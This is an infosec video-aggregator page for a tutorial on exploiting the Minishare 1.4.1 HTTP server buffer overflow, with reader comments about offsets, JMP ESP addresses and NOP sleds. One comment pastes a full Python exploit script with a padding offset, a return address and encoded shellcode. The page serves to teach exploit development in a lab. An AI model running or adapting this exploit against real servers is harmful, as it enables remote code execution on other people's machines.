Description:
Welcome to Part 4 of the Exploit Research Megaprimer.
Please begin this series by watching Part 1, if you have not already done so!In this video, we will look at how to exploit a buffer overflow which was disclosed on Exploit-Db -
Minishare 1.4.1 Buffer Overflow. You can
download the Minishare Program and follow this video.
We will first start by understanding the vulnerability from it's description on Exploit-Db and then reproduce the same in our lab setup. After this, we will use the Immunity Debgugger to examine the exploit conditions, find the offsets for RET and ESP overwrite, find the bad characters which are 0x00 and 0x0D, create shellcode for the payload encoding for these bad characters, create the exploit program and finally exploit the program! This whole journey is 30 minutes long, so fasten your seat belts and take our your debuggers :)
Hope you enjoy this video! Please do leave your comments behind.
Tags: basics ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Comments:
The weekend is almost over but thanks anyway! :D
great video mehn vivek keep them comming
Paused the vid and exploited it myself with everything I learned from the previous videos. Feels good.
very good! I like it
Dear sir ,
thanks for such amazing video
but i m facing a problem
my ESP and EIP pointing to same location
01583900
plz help me
#mu script
#!/usr/bin/python
import socket, sys
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1], 80))
buffer ="GET "
#buffer +="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
buffer +="A"*1787
#buffer +="\x53\x93\x42\x7e"
buffer +="\x87\xa7\xa7\x7c"
#buffer +="BBBB"
buffer +="\x90"*20
buffer +="\xd9\xc9\xbd\x67\xfc\x15\x09\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x56\x83\xef\xfc\x31\x6f\x14\x03\x6f\x73\x1e\xe0\xf5\x93\x57"
"\x0b\x06\x63\x08\x85\xe3\x52\x1a\xf1\x60\xc6\xaa\x71\x24\xea"
"\x41\xd7\xdd\x79\x27\xf0\xd2\xca\x82\x26\xdc\xcb\x22\xe7\xb2"
"\x0f\x24\x9b\xc8\x43\x86\xa2\x02\x96\xc7\xe3\x7f\x58\x95\xbc"
"\xf4\xca\x0a\xc8\x49\xd6\x2b\x1e\xc6\x66\x54\x1b\x19\x12\xee"
"\x22\x4a\x8a\x65\x6c\x72\xa1\x22\x4d\x83\x66\x31\xb1\xca\x03"
"\x82\x41\xcd\xc5\xda\xaa\xff\x29\xb0\x94\xcf\xa4\xc8\xd1\xe8"
"\x56\xbf\x29\x0b\xeb\xb8\xe9\x71\x37\x4c\xec\xd2\xbc\xf6\xd4"
"\xe3\x11\x60\x9e\xe8\xde\xe6\xf8\xec\xe1\x2b\x73\x08\x6a\xca"
"\x54\x98\x28\xe9\x70\xc0\xeb\x90\x21\xac\x5a\xac\x32\x08\x03"
"\x08\x38\xbb\x50\x2a\x63\xd4\x95\x01\x9c\x24\xb1\x12\xef\x16"
"\x1e\x89\x67\x1b\xd7\x17\x7f\x5c\xc2\xe0\xef\xa3\xec\x10\x39"
"\x60\xb8\x40\x51\x41\xc0\x0a\xa1\x6e\x15\x9c\xf1\xc0\xc5\x5d"
"\xa2\xa0\xb5\x35\xa8\x2e\xea\x26\xd3\xe4\x9d\x60\x1d\xdc\xce"
"\x06\x5c\xe2\xe1\x8a\xe9\x04\x6b\x23\xbc\x9f\x03\x81\x9b\x17"
"\xb4\xfa\xc9\x0b\x6d\x6d\x45\x42\xa9\x92\x56\x40\x9a\x3f\xfe"
"\x03\x68\x2c\x3b\x35\x6f\x79\x6b\x3c\x48\xea\xe1\x50\x1b\x8a"
"\xf6\x78\xcb\x2f\x64\xe7\x0b\x39\x95\xb0\x5c\x6e\x6b\xc9\x08"
"\x82\xd2\x63\x2e\x5f\x82\x4c\xea\x84\x77\x52\xf3\x49\xc3\x70"
"\xe3\x97\xcc\x3c\x57\x48\x9b\xea\x01\x2e\x75\x5d\xfb\xf8\x2a"
"\x37\x6b\x7c\x01\x88\xed\x81\x4c\x7e\x11\x33\x39\xc7\x2e\xfc"
"\xad\xcf\x57\xe0\x4d\x2f\x82\xa0\x7e\x7a\x8e\x81\x16\x23\x5b"
"\x90\x7a\xd4\xb6\xd7\x82\x57\x32\xa8\x70\x47\x37\xad\x3d\xcf"
"\xa4\xdf\x2e\xba\xca\x4c\x4e\xef"
buffer +="HTTP/1.1\r\n\r\n"
#buffer +="\xbd\xbd\x4e\xfa\x92\xdb\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x49\x31\x6a\x14\x83\xea\xfc\x03\x6a\x10\x5f\xbb\x06\x7a\x16\x44\xf7\x7b\x48\xcc\x12\x4a\x5a\xaa\x57\xff\x6a\xb8\x3a\x0c\x01\xec\xae\x87\x67\x39\xc0\x20\xcd\x1f\xef\xb1\xe0\x9f\xa3\x72\x63\x5c\xbe\xa6\x43\x5d\x71\xbb\x82\x9a\x6c\x34\xd6\x73\xfa\xe7\xc6\xf0\xbe\x3b\xe7\xd6\xb4\x04\x9f\x53\x0a\xf0\x15\x5d\x5b\xa9\x22\x15\x43\xc1\x6c\x86\x72\x06\x6f\xfa\x3d\x23\x5b\x88\xbf\xe5\x92\x71\x8e\xc9\x78\x4c\x3e\xc4\x81\x88\xf9\x37\xf4\xe2\xf9\xca\x0e\x31\x83\x10\x9b\xa4\x23\xd2\x3b\x0d\xd5\x37\xdd\xc6\xd9\xfc\xaa\x81\xfd\x03\x7f\xba\xfa\x88\x7e\x6d\x8b\xcb\xa4\xa9\xd7\x88\xc5\xe8\xbd\x7f\xfa\xeb\x1a\xdf\x5e\x67\x88\x34\xd8\x2a\xc5\xf9\xd6\xd4\x15\x96\x61\xa6\x27\x39\xd9\x20\x04\xb2\xc7\xb7\x6b\xe9\xbf\x28\x92\x12\xbf\x61\x51\x46\xef\x19\x70\xe7\x64\xda\x7d\x32\x2a\x8a\xd1\xed\x8a\x7a\x92\x5d\x62\x91\x1d\x81\x92\x9a\xf7\xaa\x38\x60\x90\xab\xbc\x6a\x61\x3c\xbe\x6a\x70\xe0\x37\x8c\x18\x08\x11\x06\xb5\xb1\x38\xdc\x24\x3d\x97\x98\x67\xb5\x1b\x5c\x29\x3e\x56\x4e\xde\xce\x2d\x2c\x49\xd0\x98\x5b\x76\x44\x26\xca\x21\xf0\x24\x2b\x05\x5f\xd7\x1e\x1d\x56\x4d\xe1\x4\x97\x81\xe1\x8a\xc1\xcb\xe1\xe2\xb5\xaf\xb1\x17\xba\x7a\xa6\x8b\x2f\x84\x9f\x78\xe7\xec\x1d\xa6\xcf\xb3\xde\x8d\xd1\x88\x08\xe8\x57\xf8\x3e\x18\x94"
sock.send(buffer)
sock.close()
hi sir my problem get solved thanks .i m doing some silly mistake
Hey,
Great videos, highly professional.
One small correction, the first JMP ESP was from shell.dll the second from user32.dll :-)
Very nice video!! But the sound is awful :(
Thanks for the amazing video series! Has been extremely informative for me. I just have a quick question about the exploit. Why is the NOP slide necessary in this case? I would think that if I change EIP to point to a location that executes JMP ESP instruction, that it would do just that.. jump to ESP. If I remove the NOP slide from the exploit, the program crashes. If my shell code is located where ESP points to, should it not just work without the NOP's? Is it that ESP is being changed after the overflow and no longer points directly to my shellcode? This has been somewhat confusing for me. Thanks again for the video and any clarification of this for me, I really do appreciate the amount of work you have put into these videos and I'll be watching all of them!
Hi, great megaprimer!! i love it but i have two questions:
Question 1: the same that "elitedev" on Sun 08 Jul 2012
Question 2: Why are there (buffer +="\x90"*20) 20 NOPs ??
Thanks :)
Thanks Vivek.nice Tutorial.
Can you please update link for minishare1.4.1 as source-forge link is dead and i am unable to find one online.
Hey,
For all those people struggling to find minishare 1.4.1 here is the link
http://heapoverflow.com/f0rums/projects/exploits/07-minishare-http-server-buffer-overflow/downloads/vulnapp.zip
Thanks to heapoverflow for hosting this file.
Thanks Vivek - great video again. I have the same question as others though. I was able to code this entire exploit in advance of starting the video except for it was failing because I was missing these NOPs. If ESP is 4 bytes after EIP, then after writing "GET " followed by 1787 As, followed by the 4 byte EIP, surely the shell code should then follow immediately after, as 'jmp esp' should jump to the top of the stack, and not 'roughly' the top of the stack? Without NOPs, the exploit fails, but with 5 NOPs, it succeeds. Why please??
Thanks a lot for the minishare link by gh0st.. Had a hella time finding it..thanks..I now have uploaded this file here:
http://www.mirrorcreator.com/files/V3DICQBI/minishare-1.4.1.rar_links
Hi 2 all. Tnx for lesson :)
just 1 question, what difference between shell32.dll jmp esp and user32.dll jmp esp? with last work well, and with first does't work
Thanks for all exploit research videos.I have just quick questions about Minishare exploit
I am using windows xp sp2 for this tutorial.I found my offset at 1787 after that I overwrote my EIP with address of shell32.dll which contains JMP ESP instruction.then I added some 20 NOP after that I added my shell code. my program is crashing after 1787 but my shell code is not executing also I removed bad character. please help me?